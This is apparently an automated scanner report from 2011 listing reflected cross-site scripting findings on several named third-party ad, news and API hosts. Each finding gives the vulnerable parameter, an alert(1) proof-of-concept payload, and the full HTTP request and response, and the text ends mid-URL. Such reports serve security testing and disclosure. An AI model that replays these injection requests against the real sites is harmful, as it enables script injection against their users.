This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the get request parameter is copied into the HTML document as plain text between tags. The payload 276c3<script>alert(1)</script>2f89cc1f134 was submitted in the get parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35aa8"><script>alert(1)</script>e320abbb45e was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d379f"><script>alert(1)</script>cdd4cac9c4c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7095e"><script>alert(1)</script>372b13aff79 was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2129"><script>alert(1)</script>3d7659e830d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c158e"><script>alert(1)</script>74eb6653c9a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6438"><script>alert(1)</script>21e8c03b3a3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f12c6"><script>alert(1)</script>11ed6697784 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6767c<script>alert(1)</script>579e3c6c8aa was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /63857/8b52baa86e5b07ac085974feb13e2090?callback=BF_PARTNER.gate_response6767c<script>alert(1)</script>579e3c6c8aa&cb=8827 HTTP/1.1 Host: pglb.buzzfed.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cffa8<script>alert(1)</script>3083eeb5b42 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /63857/bb0a99aabad3110617eff2ef79bb3c27?callback=BF_PARTNER.gate_responsecffa8<script>alert(1)</script>3083eeb5b42&cb=6085 HTTP/1.1 Host: pglb.buzzfed.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e276d<script>alert(1)</script>39fac306275 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /63857/d9dfb925d83ec9decb12af7e255ebee7?callback=BF_PARTNER.gate_responsee276d<script>alert(1)</script>39fac306275&cb=984 HTTP/1.1 Host: pglb.buzzfed.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8f9e"-alert(1)-"4993f914f2 was submitted in the anId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144d8f9e"-alert(1)-"4993f914f2&pubId=454&campId=179530 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A85C4E9B1CE6AFEC2478698F24E6FB3D; Path=/ Content-Type: text/javascript Date: Sat, 17 Sep 2011 01:48:34 GMT Connection: close
The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8394"-alert(1)-"5aa455f48a3 was submitted in the campId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=454&campId=179530a8394"-alert(1)-"5aa455f48a3 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B1CD64CE4ACF13A13714A33EC4F9E56D; Path=/ Content-Type: text/javascript Date: Sat, 17 Sep 2011 01:48:37 GMT Connection: close
4.145. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.adsafeprotected.com
Path:
/jspix
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af364"-alert(1)-"9591c354c26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=454&campId=179530&af364"-alert(1)-"9591c354c26=1 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=D8F12D5393B81356B131F4FF06E12958; Path=/ Content-Type: text/javascript Date: Sat, 17 Sep 2011 01:48:37 GMT Connection: close
The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a0dd"-alert(1)-"c19b890ed0c was submitted in the pubId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=4541a0dd"-alert(1)-"c19b890ed0c&campId=179530 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=FA4ADE180D50AB2EABEDD27FA7E62877; Path=/ Content-Type: text/javascript Date: Sat, 17 Sep 2011 01:48:36 GMT Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 775ff<a>a5eff5e8762 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 650a7--><script>alert(1)</script>b7520712271 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into an HTML comment. The payload b628c--><script>alert(1)</script>5426b9bf004 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37608<a>6a6ab97d218 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into an HTML comment. The payload b2040--><script>alert(1)</script>de55340569 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload 975e8<script>alert(1)</script>8e1784da2c was submitted in the limit parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/public/yql/uhTrending/cokeTrending2?format=json&callback=YAHOO_one_uh.popularSearches&_maxage=1800&diagnostics=false&limit=1975e8<script>alert(1)</script>8e1784da2c HTTP/1.1 Host: query.yahooapis.com Proxy-Connection: keep-alive Referer: http://omg.yahoo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
YAHOO_one_uh.popularSearches({"error":{"lang":"en-US","description":"Invalid value for variable 'limit' expecting an integer got '1975e8<script>alert(1)</script>8e1784da2c'"}});
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c817e<script>alert(1)</script>328a2b755f1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316238723013.0?callback=INFOLINKS.gsdCallbackc817e<script>alert(1)</script>328a2b755f1&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2F&jsv=222.0.4 HTTP/1.1 Host: router.infolinks.com Proxy-Connection: keep-alive Referer: http://www.toofab.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: max-age=0 Content-Type: text/javascript;charset=UTF-8 Content-Length: 263 Date: Sat, 17 Sep 2011 00:50:40 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6a0db<script>alert(1)</script>537547a0793 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f71aa<script>alert(1)</script>a749c541a4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6d7c0<script>alert(1)</script>807ea01e6bb was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ff2bd<script>alert(1)</script>2eed346dbcf was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c225d<script>alert(1)</script>c979af99300 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ef5a2<script>alert(1)</script>62d6a50225d was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload fe53e<script>alert(1)</script>cbd73a72ca0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload 73873<script>alert(1)</script>96519b5c9d9 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the lid request parameter is copied into the HTML document as plain text between tags. The payload 67fef<script>alert(1)</script>6a7e468dd77 was submitted in the lid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload b1512<script>alert(1)</script>2de489fe3894dc8d1 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1316238789823.1&purl=http%3A%2F%2Fwww%2Etoofab%2Ecom%2Fnews%2F&makey=47425c40415c4340415c4342445d434143444040424a40464147405d69737677&ref=www%2Etoofab%2Ecom%2F2011%2F09%2F16%2Fexclusive%2Dmelissa%2Drivers%2Dsplits%2Dwith%2Dboyfriend%2F&ptitle=hollywood%20news%2Cred%20carpet%20fashion%20and%20celebrity%20hairstyles%20%7C%20toofab%2Ccom&pid=159065&wsid=1&by=f&ptxt=latest%7Cnews%7Cmost%7Cread%7C%C2%A9%202011%20ehm%20productions%7Cinc%7Call%20rights%20reserved%7Creproduction%20in%20whole%20or%20in%20part%20without%20permission%20is%20prohibited%7Cin%20partnership%20with%20tmz%7Ccom%7C&jsv=222%2E0%2E4&page%5Fkeyw=hollywood%20news%2Cred%20carpet%20fashion%2Ccelebrity%20hairstyles%2Ccelebrity%20beauty%20buzz%2Ccelebrity%20gossip%2Cacademy%20awards%2Coscars%2Ccelebrity%20makeup%2Ccelebrity%20bikini%20bodies%2Ccelebrity%20style%2Ccelebrity%20dresses%2Ccelebrity%20jewelry%2Ccelebrity%20handbags&crtw=0&twnum=28&crtss=30&pdesc=get%20the%20latest%20celebrity%20gossip%2Chollywood%20news%2Ccovering%20red%20carpet%20fashion%20and%20events%2Ccelebrity%20hairstyles%20and%20celebrity%20beauty%20buzz%20at%20toofab%21&crt=0&pimgs=toofab%7Clove%20it%7Clive%20it%7Cthis%20week%27s%20hottest%20pics%7Cbabies%7Cboobs%20%26%20beyonce%21%7Ctoddlers%20%26%20tiaras%7Cstar%20goes%20wild%20on%20live%20tv%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Ctaylor%20lautner%20shows%20stubble%20at%7Cabduction%7Cpremiere%7Csnooki%20slams%20into%20italian%20cop%7Cwatch%20the%20accident%21%7Cjill%20zarin%7Cno%20pink%20slip%20for%7Creal%20housewives%7Cvictoria%20beckham%20%26%20baby%20harper%27s%20shopping%20spree%7Cbritney%20spears%20wears%20ring%20amid%20engagement%20rumors%7Ccelebs%20love%20camilla%20and%20marc%7Cjanuary%20jones%20gives%20birth%20to%20baby%20boy%7Cmark%20ballas%20and%20pia%20tosano%20split%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7Chewitt%20holds%20hands%20with%20rumored%20bf%7Cwho%20is%20he%7Cnew%20york%20fashion%20week%20finale%7Cfall%20tv%20calendar%7Ca%20guide%20to%20new%20%26%20returning%20shows%7Cchmerkovskiy%20brothers%20face%2Doff%20for%20the%20first%20time%21%7Cworst%20dressed%20stars%20of%20emmys%7Cpast%7Ctoday%27s%20celebrity%20birthdays%7Csarah%20jessica%20parker%27s%20many%20premiere%20looks%7Cjane%20lynch%7Cwhat%20should%20she%20wear%20at%20the%20emmys%7Chot%20shots%7Cseptember%2016%7C2011%7Cgeorge%20clooney%27s%20many%20former%20flames%7Cemmy%20awards%7Cred%20carpet%20regulars%20through%20the%20years%7Cbest%20dressed%20stars%20of%20emmys%7Cpast%7C2011%20emmy%20awards%7Cwho%20should%20win%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7Ctoofab&rts=1316238789824&csilv=4%2E0%2E60531%2E0&plinks=news%7Cphotos%7Cvideos%7Cceleb%20couples%7Cceleb%20kids%7Ctv%7Cmovies%7Cmusic%7Cfashion%20%26%20beauty%7C2011%20emmys%7Csign%20up%7Csign%20in%7Cthis%20week%27s%20hottest%20pics%7Cbabies%7Cboobs%20%26%20beyonce%21%7C1%20comment%7Ctoddlers%20%26%20tiaras%7Cstar%20goes%20wild%20on%20live%20tv%7C14%20comments%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7C43%20comments%7Ctaylor%20lautner%20shows%20stubble%20at%7Cabduction%7Cpremiere%7C3%20comments%7Csnooki%20slams%20into%20italian%20cop%7Cwatch%20the%20accident%21%7C0%20comments%7Cjill%20zarin%7Cno%20pink%20slip%20for%7Creal%20housewives%7C13%20comments%7Cvictoria%20beckham%20%26%20baby%20harper%27s%20shopping%20spree%7C2%20comments%7Cbritney%20spears%20wears%20ring%20amid%20engagement%20rumors%7C8%20comments%7Ccelebs%20love%20camilla%20and%20marc%7C0%20comments%7Cjanuary%20jones%20gives%20birth%20to%20baby%20boy%7C0%20comments%7Cmark%20ballas%20and%20pia%20tosano%20split%7C0%20comments%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7C188%20comments%7Chewitt%20holds%20hands%20with%20rumored%20bf%7Cwho%20is%20he%7C0%20comments%7Cnew%20york%20fashion%20week%20finale%7C1%20comment%7Cfall%20tv%20calendar%7Ca%20guide%20to%20new%20%26%20returning%20shows%7C0%20comments%7Cchmerkovskiy%20brothers%20face%2Doff%20for%20the%20first%20time%21%7C0%20comments%7Cworst%20dressed%20stars%20of%20emmys%7Cpast%7C0%20comments%7Ctoday%27s%20celebrity%20birthdays%7C0%20comments%7Csarah%20jessica%20parker%27s%20many%20premiere%20looks%7C0%20comments%7Cjane%20lynch%7Cwhat%20should%20she%20wear%20at%20the%20emmys%7C0%20comments%7Chot%20shots%7Cseptember%2016%7C2011%7C2%20comments%7Cgeorge%20clooney%27s%20many%20former%20flames%7C0%20comments%7Cemmy%20awards%7Cred%20carpet%20regulars%20through%20the%20years%7C0%20comments%7Cbest%20dressed%20stars%20of%20emmys%7Cpast%7C0%20comments%7C2011%20emmy%20awards%7Cwho%20should%20win%7C0%20comments%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7C188%20comments%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7C74%20comments%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7C43%20comments%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7C38%20comments%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7C28%20comments%7Cevening%20quickies%7Cjessica%20simpson%27s%20wedding%20possibly